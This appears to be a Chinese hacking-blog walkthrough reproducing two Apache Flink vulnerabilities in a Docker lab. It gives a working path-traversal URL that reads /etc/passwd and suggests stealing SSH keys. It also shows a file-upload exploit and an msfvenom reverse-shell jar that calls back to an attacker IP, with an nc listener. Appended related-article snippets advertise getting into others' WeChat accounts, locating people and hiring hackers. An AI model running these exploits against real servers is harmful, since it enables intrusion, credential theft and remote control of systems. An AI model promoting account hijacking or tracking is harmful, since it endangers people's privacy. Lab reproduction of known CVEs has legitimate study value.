Apache Flink任意文件读取(CVE-2020-17519)&& 任意文件上传(CVE-20...

访客4年前黑客文章1192

一、任意文件读取(CVE-2020-17519)

访问:http://your-ip:8081进入Apache Flink 控制面板:1610262786_5ffaa902b29b381ca4594.png!small

在地址栏使用poc:

http:/x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

读取/etc/passwd文件:1610262830_5ffaa92e95e28382444ad.png!small

测试中发现在读取/etc/shadow文件不可行,存在权限问题,访问会直接报错:1610263845_5ffaad25424c99d7c52ca.png!small

但是可以尝试利用任意文件读取尝试去读取/home目录下的用户的.ssh文件夹的ssh私钥来进行ssh登录,再进行提取操作。(笔者未进行尝试,各位看官可以根据这个思路探索一哈)

二、任意文件上传(CVE-2020-17518)

Apache Flink 控制面板的Submit New Job处存在任意文件上传:

1610262886_5ffaa96608ed38c5d5253.png!small

使用POC:

1610263121_5ffaaa51910c318faa5c2.png!small

进入查看测试环境查看已经成功上传了success:

1610263294_5ffaaafe2016638eb924b.png!small

另外我们还可以上传上传jar马实现反弹监听从而进行远程命令执行

首先我们使用kali的MSF生成jar马:

msfvenom -p java/shell_reverse_tcp lhost=192.168.153.6 lport=5555 -f jar >/home/kali/Desktop/shell.jar

其中lhost为本地机器的IP,lport为反弹的端口。

1610263469_5ffaabadcaa8b87abf72c.png!small

可以看到成功生成了jar马(shell.jar)

1610263506_5ffaabd25c203be38eec3.png!small

然后本地机器新建命令行窗口,使用nc进行端口监听:nc -lvvp 5555

1610263589_5ffaac25d1a3c5f2c67ec.png!small

最后把生成的jar马通过Submit New Job模块进行上传:

1610263634_5ffaac5230cba46a90281.png!small

点击Submit即可实现jar马反弹监听:

1610263665_5ffaac71c862443b17efd.png!small

执行远程命令:

1610263696_5ffaac90f3217a55e76ac.png!small

这里看到他的启动不是root用户,更能验证任意读取文件时读取shadow文件报错,跟权限问题相关的。

1610263730_5ffaacb28f74e9a5a1277.png!small

三、结束语

本次复现均是docker本地搭建模拟攻击行为,本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

docker地址

https://github.com/vulhub/vulhub/tree/master/flink/

相关文章

胖子黑客杀女主播电影(外国一个小胖子杀直播的电影)

胖子黑客杀女主播电影(外国一个小胖子杀直播的电影)

本文目录一览: 1、电影追凶结局什么意思 2、求一部关于美国中情局的电影 3、求一部2015有关于黑客的B站周末放映室有过的电影 4、求一个电影,关于外星人。里面还有一个黑人演员,貌似那个...

地摊卖什么吃的最火(十大最暴利的摆摊小吃)

地摊卖什么吃的最火(十大最暴利的摆摊小吃)

地摊小吃什么最火?下面这些地摊小吃你吃过几个?对付想经商却没有几多资本的伴侣来说摆地摊是快速赚钱的好要领。固然辛苦,选对小吃加盟项目对摆地摊就会起到事半功倍的浸染。那么,摆地摊卖什么好?地摊小吃什么最...

弄到别人微信密码方法(不知道密码怎么登陆别人微信)

弄到他人qq密码方式 (不清楚登陆密码怎么登陆他人手机微信) 方式 一 大伙儿应用的“微信号码”全是关联了“手机号”,只需键入“手机号”随后发送信息“短信验证码”就可以登陆了。 详尽操作流程是:...

紫药水染发的原理是什么 紫药水染发能维持多久

近期在网上盛行的紫药水染头发,有许多网民试着过,有些人不成功,有些人取得成功,有关紫药水着色的基本原理,很多人十分好奇心,那麼,紫药水染头发的基本原理是啥?能保持多长时间?下边我就产生详细介绍。 紫...

找黑客弄回自己的钱(黑客能赚多少钱)

少则几十万,我认识的一个黑客一个月估计得赚20万左右吧 不要光想着找别人帮忙,骗子太多了。靠人不如靠己。你可以自己学。找不到方向我可以教你。如果你一心要找黑客建议去域外黑客联盟或者网络攻。 及时报警。...

黑客教你定位微信地址(黑客接单定位具体位置)?

黑客接单定位具体位置,现在,互联网的开展越来越迅速,并且咱们当前的生存也离不开互联网,尤为是咱们的手机微信,给人的生存带来了庞大的变更,使得微信已经成为我们生活中的一部分,人人都有手机微信号,是互相交...